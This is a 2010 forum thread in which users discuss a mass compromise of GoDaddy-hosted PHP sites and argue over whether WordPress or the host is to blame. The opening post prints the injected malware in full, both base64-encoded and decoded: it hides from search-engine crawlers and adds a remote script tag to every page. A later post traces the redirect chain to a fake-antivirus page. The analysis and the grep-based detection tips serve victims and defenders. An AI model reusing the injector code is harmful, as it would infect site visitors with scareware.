• 0

GoDaddy Got Hacked Yesterday


Question

I'm sure some of you may be aware of the situation But as of yesterday (May 1, 2010) at around 2 AM, there was a major hack attempt on GoDaddy. At about 10 AM, GoDaddy Tweeted about this matter (See Tweet: http://twitter.com/GoDaddy/status/13199601776). The issue has not affected all of their hosting accounts and is still being investigated. The issue is not due to a flaw in WordPress as GoDaddy claims, a friend has a site that only has her own hand written PHP code and nothing more. Despite taking my friend is super obsessive about security and knows for a fact her FTP account was not compromised, she found all the PHP files on her server to be infected, even those not publicly available.

When you view the source of any of the PHP pages through the browser, you see the following line inserted just before the </body> tag:

&lt;script src="https://kdjkfjskdfjlskdjf.com/kp.php"&gt;&lt;/script&gt;

When you examine each of the PHP pages, you see this line at the top of all of them (This was the hacked code):

&lt;?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?&gt;

When you decode this, it equates to:

if(function_exists('ob_start')&amp;&amp;!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;
	if(!function_exists('mrobh')){
		if(!function_exists('gml')){
			function gml(){
				if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&amp;&amp; (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
					return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4=");
				}
				return "";
			}
		}
        if(!function_exists('gzdecode')){
			function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
				$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
				$RBE4C4D037E939226F65812885A53DAD9=10;
				$RA3D52E52A48936CDE0F5356BB08652F2=0;
      			if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;4){
      				$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
       				$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
       				$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
       			}
    			if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;8){
					$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
      			}
      			if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;16){
      				$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
      			}
				if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;2){
					$RBE4C4D037E939226F65812885A53DAD9+=2;
      			}
      			$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
      			if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
      				$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
      			}
      			return $R034AE2AB94F99CC81B389A1822DA3353;
     		}
		}
		function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
			Header('Content-Encoding: none');
			$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
			if(preg_match('/\&lt;\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
				return preg_replace('/(\&lt;\/body[^\&gt;]*\&gt;)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
			}else{
				return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
			}
		}
		ob_start('mrobh');
	}
}

I don't really understand what this code exactly does. Can any PHP code experts decipher it?

GoDaddy claimed they will investigate the issue but when my friend called, she found the tech support staff were completely oblivious to the matter.

So, if you are one of the unlucky ones whose server was a part of the attack, please check the bottom of your source code to make sure the <script> tag isn't there. Otherwise contact GoDaddy and complain.

Link to comment
https://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/
Share on other sites

Recommended Posts

  • 0

Yay I love that someone was so quick to jump on the bandwagon: https://www.neowin.net/news/wordpress-on-godaddycom-hacked

Again, GODADDY is the one that's at fault NOT WORDPRESS. Yes, outdated Wordpress installs can reek havoc but if you read the above link in my other post, it's going to revolve around the SERVERS LACK OF SECURITY.

  • 0

This absolutely needs to be in th front page. However, it should be stated that it absolutely was not the fault of WordPress as claimed by GoDaddy.

No software should be blamed for the incompetency of a hosting company.

It was not a weak password issue, or a FTP key logger as GoDaddy just told my friend.

It was GoDaddy's lack of adequate security.

Perhaps GoDaddy has some legal issues here and so not to get their butts sued, they blame some software that's not even on their servers.

  • 0

That's extremely annoying to see on the front page. :pinch:

You have to read:

www.twitter.com/GoDaddy and read all the complaints

and

http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/wordpress-compromisedhhow-to-fix-it/?isc=smtwsup

GoDaddy understands its usually WordPress or weak FTP passwords.. With the amount of reports, this appears to be WordPress on GoDaddy servers.

  • 0

Here is another report:

http://wordpress.org/support/topic/394255

Just google:

I have to be clear, nobody knows 100% what the cause is, but WordPress owners appear to be getting hacked, aside from the odd post here on Neowin, claiming that friends got hacked, without wordpress installed.

But we can all safely say that GoDaddy is the host of all these compromised websites, correct?

  • 0

A server-wide occurrence is the fault of GoDaddy and not Wordpress (as expressed by seeing this issue with non-Wordpress accounts on effect GoDaddy servers.) Not only that but people also fail to understand to bring up any Wordpress plugins that they're using. Those can be the culprit and not even Wordpress itself.

Andrew, even in the Wordpress support link, you can also see that another user chimes in that it's not Wordpress-specific: http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html

Summary: A web host had a crappy server configuration that allowed people on the same box to read each others? configuration files, and some members of the ?security? press have tried to turn this into a ?WordPress vulnerability? story.

WordPress, like all other web applications, must store database connection info in clear text. Encrypting credentials doesn?t matter because the keys have to be stored where the web server can read them in order to decrypt the data. If a malicious user has access to the file system ? like they appeared to have in this case ? it is trivial to obtain the keys and decrypt the information. When you leave the keys to the door in the lock, does it help to lock the door?

A properly configured web server will not allow users to access the files of another user, regardless of file permissions. The web server is the responsibility of the hosting provider. The methods for doing this (suexec, et al) have been around for 5+ years.

I?m not even going to link any of the articles because they have so many inaccuracies you become stupider by reading them.

If you?re a web host and you turn a bad file permissions story into a WordPress story, you?re doing something wrong.

P.S. Network Solutions, it?s ?WordPress? not ?Word Press.?

  • 0

I've been hacked once too, there was this file encoded in Base64. To access the file, you need a password. So I opened that file in cPanel, and found out the password. When I got access, I was amazed. It was like a filemanager, I can edit/delete/create new files. There were hacking tools too. I deleted it, changed my passwords and everything else to make sure that I was safe.

  • 0

I don't really understand what this code exactly does. Can any PHP code experts decipher it?

I have further checked the script via: http://web-sniffer.net/ and if you are not the Google Bot or YahooBot...

it redirects to: http://www4.suitcase52td.net/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG2eXsmYlGibZZqXlw%3D%3D

It creates 7 cookies:

HTTP Response Header

Name Value Delim

Status: HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Mon, 03 May 2010 02:58:33 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

X-Powered-By: PHP/5.2.12

Set-Cookie: cid=1; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: uid=2045; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: bid=b_Unknown; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: ls=107; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: pid=3; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: pid_3=1; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: ls_3_107=1; expires=Tue, 04-May-2010 02:58:33 GMT

And then redirects you to:

and then it redirects you via HTTP 302 code to: http://www1.safetypcwork5.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCdU9LXoKith6Swz9KwoFqbnZxxmpi2m8/UoKebWqas0GqaYZaaXprIlpVpaFzY1cStp6d2ZV6ldV/VltjSlm1TmpukyWqIppnLpKCKzKF0Y26dj5xsYGVpYm1qXqvGk6HOpaSdbmFn25LEXaPUlsnKyKNloJvZkImtpXFqZm9mcG6WZJafV6SgZm9plmSUaGWbZJWdiZSab3qqh9qilnFxbXA=

and then it finnally redirects you to a page with the following content:

&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&gt;&lt;meta http-equiv="Content-Language" content="en"/&gt;&lt;meta http-equiv="Cache-control" content="Public"/&gt;&lt;title&gt;Security Threat Analysis&lt;/title&gt;&lt;link rel="icon" href="http://www.google.com/favicon.ico"/&gt;&lt;link rel="SHORTCUT ICON" href="http://www.google.com/favicon.ico"/&gt;


  &lt;style type="text/css" media="screen"&gt;
    #loading {
      height:auto;
      left:45%;
      padding:2px;
      position:absolute;
      top:40%;
      z-index:20001;
    }
    #loading a {
      color:#225588;
    }
    #loading .loading-indicator {
      -x-system-font:none;
      background:white none repeat scroll 0 0;
      color:#444444;
      font-family:tahoma,arial,helvetica;
      font-size:13px;
      font-size-adjust:none;
      font-stretch:normal;
      font-style:normal;
      font-variant:normal;
      font-weight:bold;
      height:auto;
      line-height:normal;
      margin:0;
      padding:10px;
    }
    #loading-msg {
      -x-system-font:none;
      font-family:arial,tahoma,sans-serif;
      font-size:10px;
      font-size-adjust:none;
      font-stretch:normal;
      font-style:normal;
      font-variant:normal;
      font-weight:normal;
      line-height:normal;
    }
  &lt;/style&gt;&lt;/head&gt;&lt;body&gt;
  &lt;div id="loading" style="display:block"&gt;&lt;div class="loading-indicator"&gt;&lt;img height="50" width="50" style="margin-right: 8px; float: left; vertical-align: top;" src="Images/loading.gif"/&gt;&lt;br/&gt;&lt;span id="loading-msg"&gt;Initializing process.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;
&lt;script type="text/javascript" src="107a447c72270a52ae79e796c983523e3a563008911.js"&gt;&lt;/script&gt;
&lt;/body&gt;&lt;/html&gt;

Good! my Symantec Endpoint antivirus blocked something and I cannot access: www1.safetypcwork5.net so I will continue investigating via web-sniffer

That page, shows a loading image and loads the following javascript code: http://www1.safetypcwork5.net/107a447c72270a52ae79e796c983523e3a563008911.js

I did not post the whole code since it would detect a virus in this thread

basically it opens a fake system alerts like the following:

["To prevent damage to your computer, use CANCEL.","C"],["Your system is at risk of crash. Press CANCEL to prevent it.","C"],["Your system has been damaged due to recent virus attack. Press 'OK' to to fix it.","O"],["To improve performance of your PC press 'OK'.","O"],["Your PC is working slowly. Press 'OK' to check it.","O"]

I did not further check the complex javascript of this, but it is 1000% Malware... and I think this was caused by a Worm or maybe a virus exploting unpatched WP installs and not really brute forcing for weak passwords, because I think brute forcing is used mainly when they set your site as the target but we cannot tell if that worm affected the WP install, so its better to reinstall and continue using (if not already) safe passwords.

  • 0

TonyLock and All,

I work on Go Daddy's Social Media Team and we're working with our Security Operations Center to locate examples of non-WordPress sites that have been compromised. If you're comfortable with sharing example domains, please feel free to PM them to me.

Please know that we're actively working to identify the issue and resolve it. Further, we've published steps to correct the issue at http://fwd4.me/MFK.'>http://fwd4.me/MFK. As we continue to investigate the matter, our Security Team has noted that reports of sites with this malware that were not WordPress blogs have the commonality that an outdated version of WordPress is either powering part of the site or that it is not in use, but is still present on the hosting plan. Additionally, we have heard reports of the compromise occurring on other hosting providers.

Again, we are actively and aggressively working to identify the cause and we've published a means to correct it - http://fwd4.me/MFK .

^Salem

  • 0

Rather than asking for examples, has there been any proactive response to yanno, search and clean GoDaddy's OWN servers? It would kind of make sense that a GoDaddy tech would ensure the security of the server by searching for any affected accounts on there and if GoDaddy has a clause in their Terms of Service that they don't resolve any malware issues on the client's account, at least notify the client with a support ticket referencing to them what they need to do for the safety of their account.

You can easily run an SSH command to find some of the "core" malware files and/or content itself.

  • 0

TonyLock and All,

I work on Go Daddy's Social Media Team and we're working with our Security Operations Center to locate examples of non-WordPress sites that have been compromised. If you're comfortable with sharing example domains, please feel free to PM them to me.

Please know that we're actively working to identify the issue and resolve it. Further, we've published steps to correct the issue at http://fwd4.me/MFK.'>http://fwd4.me/MFK. As we continue to investigate the matter, our Security Team has noted that reports of sites with this malware that were not WordPress blogs have the commonality that an outdated version of WordPress is either powering part of the site or that it is not in use, but is still present on the hosting plan. Additionally, we have heard reports of the compromise occurring on other hosting providers.

Again, we are actively and aggressively working to identify the cause and we've published a means to correct it - http://fwd4.me/MFK .

^Salem

Thank you for coming here to Neowin and posting that Salem :yes: Much appreciated to put our members minds at ease.

  • 0

Rather than asking for examples, has there been any proactive response to yanno, search and clean GoDaddy's OWN servers? It would kind of make sense that a GoDaddy tech would ensure the security of the server by searching for any affected accounts on there and if GoDaddy has a clause in their Terms of Service that they don't resolve any malware issues on the client's account, at least notify the client with a support ticket referencing to them what they need to do for the safety of their account.

You can easily run an SSH command to find some of the "core" malware files and/or content itself.

I have not created scripts for over half a year since I quit my job.. but I think on linux it could be something like this:

#step 1, enter the path where the websites are hosted, it should be something like:    cd /home/UsersWebsitesAreUnderThisDirectory/
#ste 2, use the find &amp; grep
find . 2&gt;/dev/null | xargs grep -i script | grep -i php

then just analyze the output of the script for something strange (using a remote javascript -from other domain-)

but if you will be only searching for WP installs trying to connect to: kdjkfjskdfjlskdjf.com you may want to try..

#step 1, enter the path where the websites are hosted, it should be something like:  cd /home/UsersWebsitesAreUnderThisDirectory/
#ste 2, use the find &amp; grep
find . 2&gt;/dev/null | xargs grep -i kdjkfjskdfjlskdjf

Those 2 are not the best scripts for this, but those should do the job. Good luck

  • 0

It is not our job to provide tech support to GoDaddy. It is GoDaddy's job to provide security to it's customers.

Recently, GoDaddy gave away $100,000 in cash prize money to a competition winner, as a means of advertising. If they can afford to give a way a tenth of a millions dollars (USD) in cash to random members of the public, then surely they have enough money to hire a single security expert who can actually tell the server crew at GoDaddy what a crappy job they've done so far.

Update: I've just had a good friend from England email me about a similar issue with GoDaddy.

It bother's me that such a seemingly good company can allow your data's security to be compromised so easily and then just blame something else to not get their butts sued.

@Salem (of GoDaddy)

It's funny you have to come here and be an apologetic for GoDaddy. Get your act together before you have a class action law suit on your hands.

------------------

@bytes2000

I have not created scripts for over half a year since I quit my job.. but I think on linux it could be something like this:

#step 1, enter the path where the websites are hosted, it should be something like:    cd /home/UsersWebsitesAreUnderThisDirectory/
#ste 2, use the find &amp; grep
find . 2&gt;/dev/null | xargs grep -i script | grep -i php

then just analyze the output of the script for something strange (using a remote javascript -from other domain-)

but if you will be only searching for WP installs trying to connect to: kdjkfjskdfjlskdjf.com you may want to try..

#step 1, enter the path where the websites are hosted, it should be something like:  cd /home/UsersWebsitesAreUnderThisDirectory/
#ste 2, use the find &amp; grep
find . 2&gt;/dev/null | xargs grep -i kdjkfjskdfjlskdjf

Those 2 are not the best scripts for this, but those should do the job. Good luck

We should not have to provide this code to GoDaddy. They have administrators who get paied for this. Ask for money since they are obviously looking at this thread and will no doubt be using your code.

  • 0

It is not our job to provide tech support to GoDaddy. It is GoDaddy's job to provide security to it's customers.

Recently, GoDaddy gave away $100,000 in cash prize money to a competition winner, as a means of advertising. If they can afford to give a way a tenth of a millions dollars (USD) in cash to random members of the public, then surely they have enough money to hire a single security expert who can actually tell the server crew at GoDaddy what a crappy job they've done so far.

Update: I've just had a good friend from England email me about a similar issue with GoDaddy.

It bother's me that such a seemingly good company can allow your data's security to be compromised so easily and then just blame something else to not get their butts sued.

@Salem (of GoDaddy)

It's funny you have to come here and be an apologetic for GoDaddy. Get your act together before you have a class action law suit on your hands.

------------------

@bytes2000

We should not have to provide this code to GoDaddy. They have administrators who get paied for this. Ask for money since they are obviously looking at this thread and will no doubt be using your code.

Yes but, I care because 7 of my sites are hosted on Godaddy (currently none of them were altered) , I like all the stuff related to IT security and I currently have no job, so this is my spare time. Also.. I Dont think if they pay people for system administrators they have all the neccesary knowledge! I worked for the world leader in computer sales in the support area and I had more knowledge than some of the administrators.

Haha you are right, if they need help they can use Google or give some rewards, but I'm always willing to give my advice :p Im not an expert but I have some experience and creativity, which sometimes is helpful.

  • 0

Just caught GoDaddy spying on me, just as I had suspected.

This screenshot is of my profile as of 12:23 AM PDT. Look who is spying on me and on this thread at 10:27 PM rather than fix the security holes in their servers:

post-15711-12728715472814.png

GoDaddy specifically made their Neowin account to comment on this thread and to address me directly. Clearly they are worried and don't have a clue what is going. Funny actually.

  • 0

Because they clicked on your

profile, they are spying on you?

It isn't who is looking at your profile right now, but who did click on your profile last.

I think you are way over reacting. GoDaddy is just trying to clear their name, and because your friends got hacked, you seem to take this personally against GoDaddy, as if they were the ones behind this.

You are making this situation much worse than it has to be. And threatening them with a lawsuit? Please! You already said your friends got hacked, and not you personally. I also don't like your attitude towards the GoDaddy member. He posted a reply to help the situation and you blew up at him for taking his time and coming here to post this.

Sickening, and I think you owe him an apology.

  • Like 3
  • 0

Just caught GoDaddy spying on me, just as I had suspected.

So they checked your profile out. They didn't bother to hide their identity behind a fake account, did they? Relax..

If I followed your logic, I'd better be worried because on 24th April my profile was viewed by a profile named asda (likely random - check the position of those letters on the keyboard) created on the same day, filled with no information and that seems to be the only thing that profile has done on neowin (visit my profile). If I'm lucky, it's only someone who wanted to mark me down anonymously (star rating). If not, somebody is harvesting information about me, or performing background checks. There's nothing I can really do about it.

On topic, I have GoDaddy accounts but none of my php files seem to have been compromised.

  • Like 3
  • 0

My Godaddy site just got hacked also. It is just a simple PHP site, mostly html with .php page extensions. All the php files were hacked. Godaddy is in an extreme state of denial. They just sent a form email implying that it was somehow my fault. Definitely not just a Wordpress problem.

  • 0

Because they clicked on your

profile, they are spying on you?

It isn't who is looking at your profile right now, but who did click on your profile last.

I think you are way over reacting. GoDaddy is just trying to clear their name, and because your friends got hacked, you seem to take this personally against GoDaddy, as if they were the ones behind this.

You are making this situation much worse than it has to be. And threatening them with a lawsuit? Please! You already said your friends got hacked, and not you personally. I also don't like your attitude towards the GoDaddy member. He posted a reply to help the situation and you blew up at him for taking his time and coming here to post this.

Sickening, and I think you owe him an apology.

Apology? How old are you son? Apology for speaking the truth? Only on Neowin!

Thereal issue is responsibility.

GoDaddy is refusing to accept responsibility, because they know as soon as theystop blaming WrodPress and state the truth that they themselves failedto provide the minimalist of reasonable security, they will get theirbutts sued! So GoDaddy is desperately looking for a way out. Sofar, WrodPress is their scapegoat but despite WrodPress's failings, any true technologist knows the account management systemset up by GoDaddy it the one who is truly at fault here and not WordPress. If aclass action law suit were to be filed, any 10 year old with alittle knowledge of UNIX could prove the fault is withGoDaddy and not WordPress. That's why you can see they have tried hard thisweekend to bury this matter.

If you read a great many other tech forums, you'll see that others are also lookingin to a class action law suit. Thank God I don't host with GoDaddy or I wouldcertainly sue them for allowing my website to become vulnerable under theircare.

Kindly don't make this about me vs GoDaddy, it's about people vs GoDaddy.

  • GoDaddy, by their own incompetence have enabled hackers to access other accounts on their servers, distribute viruses via all of our websites and have possibly allowed the same hackers to have access to restricted data on the servers, not to mention the databases.
  • It's evident that GoDaddy, by their own flawed security has become the vehicle for the transpiration of internet viruses.
  • GoDaddy lied about the attack publicly (knowingly lied and also were vastly economical with the truth).
  • GoDaddy blamed people for using WordPress, even though they didn't have WordPress installed on their servers.
  • GoDaddy provided a completely useless support page that hardly address the issue and was more of a publicity act to support their blame of WordPress.
  • GoDaddy failed to adequately inform their customers of the attack, or advise them proactively what to do.
  • GoDaddy failed to restore the infected files.
  • GoDaddy failed to adequately inform their tech support staff of the issue.
    • When the GoDaddy tech support staff sought clarification, they themselves were informed the client (all of us) probably had key loggers to track FTP passwords (What utter BS).

    [*]After 2 of my friends and I called GoDaddy to find out what is going on, we were given the run around, and they ask us to help them!?[*]Reading Salem's post, it's clear GoDaddy recorded the conversation with one of my friends, without informing them the phone call was being recorded beforehand. Isn't this an OffCom and also an FCC violation? I was on Skype with my friend while he had GoDaddy on speaker-phone so I heard everything![*]After all of which, GoDaddy followed and address me directly on Neowin just because I brought the issue to the attention of the public. GoDaddy has been hacked before and you never saw them chasing someone down who reported the matter publicly.[*]Then for no reason, 2 hours after making their Neowin account, GoDaddy examines my Neowin profile.

Therefore, as a concerned Neowin member, a possible future GoDaddycustomer (probably not any more though), and a good netizen, I see itperfectly reasonable to raise more questions about GoDaddy, and it'srecent failing. If you don't have any such concerns, then you are obviously onthe payroll of GoDaddy.

If anyone wasn't infuriated by GoDaddie's failings, I'dcall serious doubt in relation to you being a technologist,least a tech forum news reporter.

The bottom line is, GoDaddy needs to do the following:

  • Hire experts who know how to lock down user accounts so one account can never have access to another.
  • Stop making a bigger fool of themselves by:
    • Making false Tweets about the issue.
    • Stop blaming WordPress, start accepting complete and utter responsibility.
    • Following me around the internet.
    • Asking the public to do their jobs.

    [*]Make a public apology to everyone for their total lack of basic security.[*]Make a public apology to everyone for telling lies about the hack attempt.[*]Make a private apology individually to everyone whose site got infected.[*]Restore all files that have been infected and not just ask the customers to do it.[*]Insure this will never happen again, and offer heavy financial compensation if it does.[*]Insure if such a thing does happens again, they proactively inform the customer immediately.

I hope GoDaddy accept responsibility for it's failing and accepts whatit needs to do to set things right by it's customers.

But if there are back handers going out (as evident by theapologist for the GoDaddy's apologist) then I highly doubt it.

GoFigure GoDaddy!

  • 0

Just caught GoDaddy spying on me, just as I had suspected.

This screenshot is of my profile as of 12:23 AM PDT. Look who is spying on me and on this thread at 10:27 PM rather than fix the security holes in their servers:

post-15711-12728715472814.png

GoDaddy specifically made their Neowin account to comment on this thread and to address me directly. Clearly they are worried and don't have a clue what is going. Funny actually.

And seriously, to expand on what andrew said.

The guy asked for what other domains you knew of that had been compromised, you could have provided that here or sent him a pm. instead you came up with another anonymous godaddy friend without wordpress. it could very well be they have unused wordpress files on the server or that wjatever the do use is based on wordpress

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • OpenAI is rolling out a major upgrade to ChatGPT memory by Pradeep Viswanathan OpenAI is rolling out a major upgrade to ChatGPT's memory, making the system more capable, current, and scalable across long-term use. Memory allows ChatGPT to remember useful details about users, including their preferences, projects, and constraints. Instead of starting every conversation from scratch, ChatGPT can use this context to provide more relevant responses in future chats. OpenAI first launched saved memories in February 2024. That feature allowed users to explicitly ask ChatGPT to save information into its memory, such as travel plans or writing preferences. However, this system had limits because it depended heavily on users giving clear instructions to remember something. Additionally, saved memories could become stale over time. In April 2025, OpenAI expanded memory by allowing ChatGPT to reference past chat context outside the saved memories list. This was powered by a background process called “dreaming,” which automatically curates memories from chat history. This made ChatGPT better at learning from natural conversation without requiring users to manually save every detail. Today, OpenAI announced a more capable and compute-efficient memory architecture built on top of dreaming. This new system improves ChatGPT’s ability to carry forward useful context, follow user preferences, and remain accurate as time passes. According to OpenAI’s internal evaluations, the new system improves factual recall from 67.9% in 2025 to 82.8% in 2026. Preference adherence improves from 55.3% to 71.3%, while accuracy over time improves from 52.2% to 75.1%. The best part of this new system is a new memory summary page where users can review ChatGPT's memories. Users can even update details, correct information, or give instructions on what topics ChatGPT should bring up and when. This new, improved memory system is available to ChatGPT Plus and Pro users in the US starting today. It will roll out to more countries, as well as Free and Go users, in the coming weeks.
    • I work for a video production company in Australia. The camera operators shoot footage and then pass the SD card over to the editors. Much easier than handing over the entire camera. Plus, on a busy day you can hand off the SD card and then pop another in for the next shoot. Or, you might have used multiple SD cards because you need the extra space for a long shoot. I also use USB cables and wifi for transferring footage, but in many cases an SD card reader is the easiest method.
